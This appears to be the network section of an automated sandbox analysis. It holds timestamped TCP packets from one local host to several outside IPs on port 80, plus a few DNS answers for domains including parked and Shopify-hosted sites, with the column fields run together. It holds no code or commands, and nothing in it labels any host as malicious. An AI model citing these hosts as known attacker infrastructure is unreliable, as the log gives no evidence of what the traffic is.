                                                                                                                              Dec 4, 2023 15:27:49.692608118 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.693974018 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.694056034 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.880268097 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880346060 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880403042 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880454063 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880498886 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880557060 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880580902 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.880662918 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880714893 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880732059 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.880760908 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880814075 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:49.880892038 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.881072044 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.881072044 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:50.063167095 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063244104 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063299894 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063345909 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063393116 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063421965 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:50.063553095 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:50.063630104 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063699007 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.063867092 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.064382076 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.064433098 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.245707989 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.245788097 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.245841026 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.245888948 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.246258020 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.246334076 CET805021191.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:50.246567011 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:51.196511030 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.212259054 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.394535065 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.394915104 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.395113945 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.615515947 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615612984 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615680933 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615756035 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615813017 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615834951 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.615874052 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615931034 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615986109 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.615988970 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.616038084 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.616050005 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.616111994 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.616209030 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.616352081 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.798149109 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798304081 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798430920 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798552036 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798566103 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.798666954 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798789978 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798830986 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.798861027 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.798922062 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:52.799025059 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.799364090 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.799433947 CET5021280192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:52.981575966 CET805021291.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:58.009862900 CET5021380192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:27:58.198178053 CET8050213217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:58.198437929 CET5021380192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:27:58.198612928 CET5021380192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:27:58.396634102 CET8050213217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:58.402602911 CET8050213217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:58.402642012 CET8050213217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:58.402786016 CET5021380192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:27:59.710365057 CET5021380192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:00.725863934 CET5021480192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:00.914251089 CET8050214217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:00.914402008 CET5021480192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:00.914663076 CET5021480192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:01.103141069 CET8050214217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:01.109859943 CET8050214217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:01.109924078 CET8050214217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:01.110393047 CET5021480192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:02.428484917 CET5021480192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.444132090 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.632354021 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.632617950 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.633934021 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.822387934 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.822479963 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.822523117 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.822649002 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.822666883 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.822734118 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.822783947 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.822786093 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.822829008 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.823013067 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.823029041 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.823177099 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.823226929 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.823271036 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.823347092 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.823415041 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:03.823527098 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:03.823697090 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:04.011122942 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011214972 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011280060 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011322975 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011367083 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011384010 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:04.011426926 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:04.011470079 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:04.011538029 CET5021580192.168.11.20217.160.0.27
                                                                                                                              Dec 4, 2023 15:28:04.011706114 CET8050215217.160.0.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:31.139692068 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:31.140122890 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:31.140186071 CET805022391.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:31.140418053 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:32.093869925 CET5022380192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.110106945 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.292052984 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.292289972 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.292427063 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.515907049 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.560586929 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.560736895 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.560800076 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.560862064 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.560926914 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.560935020 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.561026096 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.561086893 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.561144114 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.561201096 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.561256886 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.561306953 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.561688900 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.742947102 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743212938 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743235111 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743275881 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743293047 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743309021 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743324995 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743392944 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.743428946 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743441105 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.743457079 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:33.743732929 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.743863106 CET5022480192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:33.925494909 CET805022491.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:39.104357004 CET5022580192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:39.281435013 CET805022591.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:39.281812906 CET5022580192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:39.281903028 CET5022580192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:39.458740950 CET805022591.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:39.458811998 CET805022591.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:39.458861113 CET805022591.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:39.459145069 CET5022580192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:40.795039892 CET5022580192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:41.810704947 CET5022680192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:41.993710995 CET805022691.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:41.993904114 CET5022680192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:41.994136095 CET5022680192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:42.177057981 CET805022691.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:42.177186012 CET805022691.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:42.177236080 CET805022691.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:42.177463055 CET5022680192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:43.497685909 CET5022680192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.513137102 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.689687014 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.690197945 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.691514969 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.868134975 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868226051 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868310928 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868355036 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868402004 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868405104 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.868474960 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868558884 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868573904 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.868704081 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868745089 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.868803024 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868865013 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:44.868912935 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:44.869080067 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:45.045428991 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.045455933 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.045526028 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.045654058 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:45.045736074 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.045774937 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.045805931 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:45.045923948 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.045979023 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:45.046056986 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046084881 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046103954 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046143055 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:45.046205044 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046230078 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046251059 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046282053 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046300888 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046314001 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:45.046401978 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046433926 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046453953 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046477079 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046513081 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.046533108 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222377062 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222402096 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222428083 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222460985 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222626925 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222696066 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222892046 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.222927094 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223200083 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223222971 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223239899 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223256111 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223275900 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223293066 CET805022791.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:45.223479986 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:46.200119972 CET5022780192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:47.215734959 CET5022880192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:47.395553112 CET805022891.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:47.395811081 CET5022880192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:47.395925999 CET5022880192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:47.574801922 CET805022891.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:47.574867964 CET805022891.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:47.574917078 CET805022891.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:47.575443029 CET5022880192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:47.575531006 CET5022880192.168.11.2091.184.0.200
                                                                                                                              Dec 4, 2023 15:28:47.754189968 CET805022891.184.0.200192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:52.589529037 CET5022980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:52.771811962 CET805022991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:52.772058010 CET5022980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:52.772299051 CET5022980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:52.954888105 CET805022991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:52.954901934 CET805022991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:52.955100060 CET5022980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:54.276454926 CET5022980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:55.292228937 CET5023080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:55.474997044 CET805023091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:55.475238085 CET5023080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:55.475392103 CET5023080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:55.658785105 CET805023091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:55.658859015 CET805023091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:55.659162998 CET5023080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:56.979038000 CET5023080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:57.994607925 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.177315950 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.177735090 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:40.475951910 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.476008892 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.476099014 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.476298094 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.476389885 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.652173042 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:50.498748064 CET5023880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:29:50.615757942 CET8050238108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:50.615969896 CET5023880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:29:50.616137981 CET5023880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:29:50.733120918 CET8050238108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:50.831990957 CET8050238108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:50.832057953 CET8050238108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:50.832442999 CET5023880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:29:50.832499027 CET5023880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:29:50.949688911 CET8050238108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:55.841434956 CET5023980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:29:56.017421007 CET8050239198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:56.017647982 CET5023980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:29:56.017821074 CET5023980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:29:56.192879915 CET8050239198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:56.339462996 CET8050239198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:56.339561939 CET8050239198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:56.339946985 CET5023980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:29:56.340013981 CET5023980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:29:56.514992952 CET8050239198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:30:02.449196100 CET5024080192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:30:02.618052959 CET8050240198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:30:02.618247032 CET5024080192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:30:02.618408918 CET5024080192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:30:02.784259081 CET8050240198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:30:02.795258045 CET8050240198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:30:02.795301914 CET8050240198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:30:02.795540094 CET5024080192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:30:02.795629978 CET5024080192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:30:02.962137938 CET8050240198.252.98.64192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                              Dec 4, 2023 15:27:58.009080887 CET1.1.1.1192.168.11.200xf766No error (0)www.austintrafficlawyer.com217.160.0.27A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:11.700593948 CET1.1.1.1192.168.11.200xe7e9No error (0)www.littlehappiez.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:11.700593948 CET1.1.1.1192.168.11.200xe7e9No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:24.999907017 CET1.1.1.1192.168.11.200x29c7No error (0)www.engindenizyurdu.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:24.999907017 CET1.1.1.1192.168.11.200x29c7No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:39.103446960 CET1.1.1.1192.168.11.200x3048No error (0)www.opleverdossier.onlineopleverdossier.onlineCNAME (Canonical name)IN (0x0001)false
